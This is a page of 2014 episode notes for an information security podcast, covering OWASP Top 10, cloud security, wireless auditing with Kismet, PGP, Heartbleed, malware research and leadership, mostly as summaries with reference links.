I will be taking input until 0000 UTC on Sunday July 6th (1800 Saturday 5 July US/Eastern). You can only vote once.
Establishing an Information Security program can make or break an organization. So what do you need to get that started?
We have friend of the show Phil Beyer come in and discuss with us the five steps of the creation of an Information Security Program. Join us for Part 1, and next week, we'll finish up with a little Q&A, as well as what a 'risk register' is.
We finished up the OWASP Top Ten List. We discussed Injection, XSS, and other goodness. Find out what makes the Top 5 so special.
http://risky.biz/fss_idiots - Risky Business Interview concerning Direct Object Reference and First State Superannuation
http://oauth.net/2/ - Great information on OAUTH 2.0.
As we wade through the morass of the Infosec swamp, we come across the OWASP 2013 report of web app vulnerabilities. Since Mr. Boettcher and I find ourselves often attempting to explain these kinds of issues to people on the Internet and in our daily lives, we thought it would be prudent to help shed some light on these.
So this week, we discuss the lower half of the Top 10, the ones that aren't as glamorous or as earth-shaking as XSS or SQLI, but are gotchas that will bite thine ass just as hard.
Next week is the big ones, the Top 5... all your favorites, in one place!
OWASP Top 10 (2013) PDF: http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013.pdf
Costs of finding web defects early (2008): http://www.informit.com/articles/article.aspx?p=1193473&seqNum=6
Published on: June 16, 2014
This is part 2 of our podcast interview with Guillaume Ross, an Infosec professional who is well versed in the intricacies of various cloud architectures, whether they are IaaS, PaaS, or SaaS. This part of the podcast discusses how contracts are established, and we ask if smaller cloud providers have a chance against behemoths like Google, Amazon, and Microsoft.
Links brought up during the interview:
Rich Mogull's $500 Epic fail - https://securosis.com/blog/my-500-cloud-security-screwup
Rich Mogull's write-up on the aftermath and investigation - https://securosis.com/tag/cloud+security
Amazon VPC: http://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/VPC_Introduction.html
Azure Endpoints (how-to): http://azure.microsoft.com/en-us/documentation/articles/virtual-machines-set-up-endpoints/?rnd=1
Brian and I interviewed Mr. Guillaume Ross (@gepeto42), an Information Security professional who helps organizations get themselves situated in cloud-based solutions. We get a better understanding of why people would want to put their info into the 'cloud' and how cloud solutions are different from traditional co-lo and datacenters.
Guillaume's Blog: http://blog.binaryfactory.ca/
AWS (amazon) Security Best Practices WhitePaper: http://aws.amazon.com/whitepapers/aws-security-best-practices/
Amazon EC2 FAQ: http://aws.amazon.com/ec2/faqs/
Microsoft's Azure FAQ: http://azure.microsoft.com/en-us/support/faq/?rnd=1
"cloud computing icon" courtesy of smartdatacollective.com
As promised, I am posting a video I made explaining how to set up Kismet to do wireless scans.
The only prerequisites you need are VMware (it will work the same in VirtualBox) and a VM of Kali Linux. The only real difference is the message that asks where the wireless adapter should connect.
It's my first attempt editing a video, so please be kind
Published on: May 27, 2014
Mr. Boettcher and I had a great time this week. We talked all about doing wireless audits for PCI using Kismet and Aircrack-ng, and talked about some capabilities of both.
Alfa AWUS051NH (works in Kali/Backtrack) (no sponsor link): http://www.amazon.com/gp/offer-listing/B002BFO490/ref=dp_olp_0?ie=UTF8&condition=all
kismetwireless.net
Using Karma with a pineapple to fool clients into connecting unencrypted: http://www.troyhunt.com/2013/04/your-mac-iphone-or-ipad-may-have-left.html
Tutorial on hacking various wireless: http://cecs.wright.edu/~pmateti/InternetSecurity/Lectures/WirelessHacks/Mateti-WirelessHacks.htm
Premium content by Bryan! I made a video as well that describes using your wireless dongle to make your Kali Linux into a powerful areal wireless sniffer. http://brakeingsecurity.com/bonus-kismet-video
Sharing information between people and organizations can be a sensitive issue, especially if the information being shared is of mutual importance.
This week, we break down PGP and its open source cousin GPG. We discuss how last week's podcast about hashing, encoding, and encryption is all bundled up neatly in PGP, and give you some examples of software you can use on Mac, Windows, and Linux.
GPG4Win - http://www.gpg4win.org/
GPG Suite (Mac OS) - https://gpgtools.org/
public PGP key server - pgp.mit.edu
NoStarch Press book: http://www.nostarch.com/pgp.htm
gpg commandline tutorial - http://irtfweb.ifa.hawaii.edu/~lockhart/gpg/gpg-cs.html
Icon courtesy of NoStarch Press
Ever heard someone mention AES Encoding, or MD5 Encryption?
Many people in IT, Infosec, and software development get confused about what Hashing, Encrypting, and Encoding are. We hack through the definition forest, looking for that Sequoia of understanding.
We also talk about Symantec's remarks that 'Antivirus is dead' and 'not a moneymaker', and what that means to the industry as a whole.
"Enkrypto" is the program I mentioned in the podcast. It would appear that s/he fixed it. Still, you shouldn't be using an 'encoding' method to store SMS messages if they are of a sensitive nature... The screenshots still clearly show a Base64-encoded SMS, and still show it as a 'secured' message. :( Plus, with the option to allow an encryption PIN of 4 characters, it would be trivial to crack even an AES-encrypted message.
Do not buy this app...
https://play.google.com/store/apps/details?id=org.enkrypto.sms
Published on: May 13, 2014
This week, we find ways to increase security when browsing the EWW (Evil Wide Web).
We give a shout-out to WhiteHatSec's Aviator browser as a way for everyone to have an elevated security posture with very little configuration required. And Mr. Boettcher and I talk about some of the plugins we use to make ourselves more secure.
And Mr. Boettcher surprises me with his proclivities toward farmyard animals.
Aviator Browser: https://www.whitehatsec.com/aviator/
Sandboxie: http://www.sandboxie.com/
Browser plugins:
Firefox --- Request Policy: https://addons.mozilla.org/en-US/firefox/addon/requestpolicy/
Google --- Notscript: http://www.dedoimedo.com/computers/google-chrome-notscript.html
Mandiant put out their 2014 Threat Report, and we got into all the meaty goodness, from the Syrian Electronic Army and Iran to China's APT1 and APT12.
Are the bad guys getting smarter, or are we just making it easier for them? Have a listen and find out.
Mandiant 2014 report (registration required): http://connect.mandiant.com/m-trends_2014
Since 2006, Verizon has put out their yearly PCI report. We break it down, and discuss the merits of the report.
2014 Verizon Report: www.verizonenterprise.com/resources/reports/rp_pci-report-2014_en_xg.pdf
This is Part 2 of our interview with Phil Beyer. We asked him about the difference between mentoring and coaching, and we end the podcast talking about influence, the types of influence and ways to gain influence.
The heartbleed.com domain was registered on 5 April 2014 by Marko Laakso of Codenomicon, according to the whois record.
RFC6520 - TLS Heartbeat (co-authored by Robin Seggelmann) https://tools.ietf.org/html/rfc6520
Slashdot article: http://it.slashdot.org/story/14/04/10/2235225/heartbleed-coder-bug-in-openssl-was-an-honest-mistake
OpenBSD's Theo De Raadt having a rant about OpenSSL: http://it.slashdot.org/story/14/04/10/1343236/theo-de-raadts-small-rant-on-openssl
OpenSSL's malloc issues: http://www.tedunangst.com/flak/post/analysis-of-openssl-freelist-reuse and http://www.tedunangst.com/flak/post/heartbleed-vs-mallocconf
Custom Snort rules to detect HeartBleed: http://blog.snort.org/2014/04/sourcefire-vrt-certified-snort-rules_10.html
Intro/Outro Music:
"All This" Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Published on: April 14, 2014
This week, we're leaving the Infosec track a bit, but this interview may be more important to a person's development as a good Infosec professional.
We interviewed Mr. Phil Beyer, Director of Information Security for the Advisory Board Company. In addition to being a past president of the Capitol of Texas ISSA Chapter, he co-founded the Texas CISO Council, a regional steering committee composed of security leaders from private industry and the public sector.
He recently gave a talk at Bsides Austin about leadership, and how anyone can be a leader of men. It was very inspiring, and something Mr. Boettcher and I thought people in any line of work, not just infosec, would benefit from. If you would like to hear his Bsides Austin talk, we have an exclusive audio copy of the talk, which you can find with his slideshare link here: Brakeingsecurity.com
Please leave feedback if you like this, or please feel free to re-tweet/share this elsewhere.
I take a few minutes to explain a quick mass-renaming shortcut using sed that I use when I have multiple files to rename. I used the example of spaces in filenames, but you can use this to append a name to multiple files.
Another way to easily change files is to use the 'tr' command. You can change a filename from all lowercase to all uppercase letters, or even remove non-printable characters from filenames.
Take a look, please leave feedback. I know there are other ways using awk, perl, and others. This is just another way to do it.
Published on: April 4, 2014
We are pleased to be the only podcast to have audio of the talk Phil Beyer gave at Bsides Austin! It is a very informative talk about leadership, not just in Information Security, but how to be a leader in any field.
Brakeing Down Security will also carry a 2-part interview with Phil. The first will post on the 6th of April, and the 2nd part will be on the 13th of April.
Phil uploaded the slides of this presentation at Bsides Austin at http://www.slideshare.net/pjbeyer/choose-to-lead.
Brakeing Down Security would like to thank Phil Beyer for his time and generosity.
Published on: March 31, 2014
We discuss IDS and IPS, why they are needed, why they get a pass on how easily they are bypassed, and why AV gets all the press...
Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Published on: March 31, 2014
This week, we got into some discussion about frameworks, and the different types of frameworks available (regulatory, "best practice", and process improvement).
We also looked at the new "Framework for Improving Critical Infrastructure Cybersecurity" ratified and released last month.
Does it meet with our high expectations? You'll just have to listen and find out.
http://www.nist.gov/cyberframework/
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Cracking great show this week! Mr. Boettcher and I got all into authentication methods, why they don't always work, and what we can do to make passwords more secure, using Mike Murray's method of 'Passphrases' over passwords...
Finally, we talked about some adventure Mr. Boettcher had with a friend's malware infection (it wasn't me, I promise!). He took what we learned from @hackerhurricane (Michael Gough) and is actively doing forensics on it.
http://daleswanson.org/things/password.htm
Malware, Rootkits & Botnets A Beginner's Guide by Christopher Elisan
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
This is Part 2 of our Interview with Kevin Johnson. During our interview, we followed him down the rabbit hole. We learned how the default rulesets in ANY rules-based hardware solution suck. We learned that being a security professional is more than just a fancy title. And finally, we learned that Kevin is a huge fan of Star Wars.
DB Visualizer -- http://www.dbvis.com/
Good article on how homomorphic encryption works:
http://www.americanscientist.org/issues/pub/2012/5/alice-and-bob-in-cipherspace
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
I was on LinkedIn this morning and came across this link in the 'Pentesting' group, one of the many groups I have joined there.
It's a series of case studies with a scenario and some questions to be answered in a 5,000 word essay format.
http://resources.infosecinstitute.com/computer-forensics-investigation-case-study/
I thought that in the coming episodes of Brakeing Down Security, it might be interesting to spend a little time breaking down one of these case studies, analyze all the info provided, and give our ideas on how we might go about solving the issue or mitigating what has occurred. Then, we could turn our rabid fans loose on the problem and see if we missed anything, or if someone comes up with a better response (highly likely, as we have many intelligent listeners)
Look for this to happen in the next few weeks.
Published on: March 7, 2014
During our SEC542, GIAC Web App Pentesting course, we got the pleasure and honor of sitting down with Kevin Johnson from SecureIdeas on who he is, how Samurai WTF came into being, and why we should be doing licensing for proper ethical hackers.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
This is part 2 of our Interview with Malware researcher Michael Gough. We talk about mobile device malware, and how the Sniper Forensic Toolkit differs from Tripwire.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Infectedpc_primary.jpg is from bugsrepair.com
Published on: February 24, 2014
I thought I'd try something a little different. I usually use blogger.com to talk, but I didn't see a reason to waste all this excellent space, so I'll put my post here.
Last night on Twitter, someone had posted a pcap file of the MOON self-replicating malware running through many newer brands of Linksys router. So I thought I would post the pcap file here for all you packet weasels to enjoy.
Also, we will be posting our Part 2 of Michael Gough, an Austin-based Malware researcher, who enjoys getting an infection for a living.
moon.pcap: http://bit.ly/1eRpvaw (redirects to google drive)
MD5: 8138d3c4eb132269135ae174f703d0fb
SHA256: ed65982d9c6e7c4a1a95220af6817e4fa15662ddfd6647c55858dbc79d2bfe80
Published on: February 19, 2014
This week, we are excited to have Michael Gough, a local malware researcher from Mi2Security on with us to talk about types of malware, infection vectors, some of the tools that users have available to them to detect and prevent malware. We also discuss who gains from malware infections, the 'bad guys', and even the AV/Malware detection companies. We also talk about how his software program "Sniper Forensic Toolkit" would detect malware.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
This week, we interviewed Frank Kim, an instructor from SANS, who talks about developers' methods, the challenges of getting developers to code securely, and the efforts to create a culture of secure coding.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
All superheroes have an origin story. Brian and I are not super, but we have a great origin story. This week's podcast is about how we made it into the Infosec industry, and we also discuss the value of research from an OS point of view. We also talk about mentoring and assistance for those looking to get into the InfoSec world.
Intro "Private Eye" and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
In this issue, we talked about upcoming podcasts with Michael Gough from MI2 Security discussing malware, and this week we get into everything about alerts, why they are important, types of alerts, levels that can occur, and even a bit of incident response in handling alerts.
Intro "Private Eye" and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
This week Bryan and Brian talk about the uses, and sometimes pitfalls, of vulnerability scanners.
Intro "Private Eye" and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
In this inaugural episode, Bryan and Brian discuss the history of hashes, how hashes are used and how to make them more secure.
Intro "Private Eye" and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/